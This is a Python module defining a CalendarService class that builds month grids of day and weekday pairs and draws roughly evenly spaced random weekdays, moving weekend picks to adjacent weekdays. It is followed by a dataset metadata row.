""" Module used for operations on calendar """
import logging
import calendar
import random
FIRST_DAY = calendar.MONDAY
LOG = logging.getLogger(__name__)
class CalendarService(object):
    """Month-calendar helper: builds [day, weekday] grids for a month and
    draws roughly evenly spaced random weekdays from them.

    Grid entries are two-element lists [day_number, weekday] with weekday
    0 (Monday) .. 6 (Sunday); padding cells borrowed from neighbouring months
    have day_number == 0.
    """
    def __init__(self, request):
        super(CalendarService, self).__init__()
        self.request = request  # kept for callers; not used internally
        self.data = []  # current month grid, filled by getmonthdays()
    def __getfromdata(self, num):
        """Return the [day, weekday] entry for day number `num`, or None."""
        return next((day for day in self.data if day[0] == num), None)
    def __evenday(self, daynum):
        """Map a weekend day onto an adjacent weekday.

        Saturday (5) shifts back to Friday, Sunday (6) forward to Monday; the
        shift may leave the month, in which case None is returned and the
        caller is expected to retry. Weekdays are returned unchanged.
        """
        day = self.__getfromdata(daynum)
        if day is None:
            raise Exception("Unkown day given with value NONE")
        if day[1] > 4:
            # Saturday -> previous day, Sunday -> next day
            idx = day[0] - 1 if day[1] == 5 else day[0] + 1
            return self.__getfromdata(idx)
        else:
            return day
    def getmonthdays(self, month, year):
        """Build, cache, and return the grid for month/year (weeks start on FIRST_DAY)."""
        cal = calendar.Calendar(FIRST_DAY)
        self.data = [[num, weekday] for num, weekday in cal.itermonthdays2(year, month)]
        return self.data
    def getwellformatted(self):
        """Return the cached grid as a list of 7-entry week rows."""
        # itermonthdays2 always yields whole weeks, so len(data) % 7 == 0.
        # '//' (works on both Python 2 and 3) replaces int(len/7).
        weeks = len(self.data) // 7
        return [self.data[row * 7:(row + 1) * 7] for row in range(weeks)]
    def getwellformat(self, month, year):
        """Build the grid for month/year and return it as week rows."""
        self.getmonthdays(month, year)
        return self.getwellformatted()
    def getdaysamount(self):
        """Number of real days in the cached grid (padding cells excluded)."""
        return len([day for day in self.data if day[0] > 0])
    def getdayscount(self, month, year):
        """Number of days in month/year."""
        self.getmonthdays(month, year)
        return self.getdaysamount()
    def drawdayfromset(self, count):
        """Draw `count` roughly evenly spaced random weekdays from the grid.

        Weekend picks are shifted onto an adjacent weekday via __evenday and
        re-drawn when the shift leaves the month.
        Raises ValueError when `count` is non-positive or exceeds the number
        of days in the month (the previous version looped forever then).
        """
        end = self.getdaysamount()  # last day number of the month
        if count <= 0 or count > end:
            raise ValueError("cannot draw %d days from a %d-day month" % (count, end))
        result = []
        current = 1
        daynum = 1
        interval = int(end / count)
        for idx in range(0, count):
            # Retry until we get a day distinct from the previous pick that
            # evens onto a weekday inside the month.
            day = None
            while daynum == current or day is None:
                # Clamp to the month length: the old bound current + interval
                # could exceed `end`, making __evenday raise on the last draws.
                daynum = random.randint(current, min(current + interval, end))
                LOG.debug("Drawn day number: %s for iteration: %s", daynum, idx)
                day = self.__evenday(daynum)
            result.append(day)
            current = daynum
        return result
    def drawday(self, month, year, count):
        """Build the grid for month/year, then draw `count` days from it."""
        self.getmonthdays(month, year)
        return self.drawdayfromset(count)
| UTF-8 | Python | false | false | 2,920 | py | 108 | calendars.py | 52 | 0.585274 | 0.577397 | 0 | 75 | 37.933333 | 86 |